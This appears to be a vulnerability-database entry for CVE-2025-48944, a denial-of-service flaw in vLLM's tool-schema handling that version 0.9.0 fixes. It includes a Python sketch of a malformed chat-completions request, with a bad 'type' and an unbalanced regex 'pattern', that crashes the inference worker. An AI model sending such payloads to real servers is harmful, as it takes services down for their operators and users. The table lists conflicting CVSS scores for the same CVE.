Count: 4

CVE-2025-48944
vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.
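The advisory describes unvalidated "pattern" and "type" fields inside a tool's JSON Schema reaching the regex/schema parsing stage and crashing the inference worker. The sketch below only illustrates the shape of such a request against the OpenAI-compatible /v1/chat/completions endpoint that vLLM exposes; the server URL, model name, and the specific malformed values are assumptions for illustration, not a reproduction recipe taken from the advisory.

```python
# Minimal sketch of a chat-completions request whose tool schema carries the kind
# of malformed "pattern"/"type" values the advisory describes. Server URL, model
# name, and the exact malformed values are assumptions.
import json
import urllib.request

payload = {
    "model": "example-model",  # assumed model name
    "messages": [{"role": "user", "content": "hi"}],
    "tools": [{
        "type": "function",
        "function": {
            "name": "lookup",
            "parameters": {  # JSON Schema describing the tool's arguments
                "type": "object",
                "properties": {
                    "query": {
                        "type": 123,            # malformed: "type" should be a string
                        "pattern": "([invalid"  # malformed: unbalanced regex
                    }
                }
            }
        }
    }]
}

req = urllib.request.Request(
    "http://localhost:8000/v1/chat/completions",  # assumed local vLLM server
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"},
)
# Per the advisory, a single request like this can take down the inference worker
# on affected 0.8.x versions; 0.9.0 validates these fields before parsing them.
# urllib.request.urlopen(req)  # intentionally left commented out
```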

GHSA-vrq3-r879-7m65
vLLM Tool Schema allows DoS via Malformed pattern and type Fields
Vulnerability | CVSS | EPSS | Published
---|---|---|---
CVE-2025-48944: vLLM tool schema DoS via malformed "pattern" and "type" fields (full description above) | CVSS3: 4.3 | 0% Low | 3 months ago
CVE-2025-48944: same description | CVSS3: 6.5 | 0% Low | 3 months ago
CVE-2025-48944: same description | CVSS3: 6.5 | 0% Low | 3 months ago
GHSA-vrq3-r879-7m65: vLLM Tool Schema allows DoS via Malformed pattern and type Fields | CVSS3: 6.5 | 0% Low | 3 months ago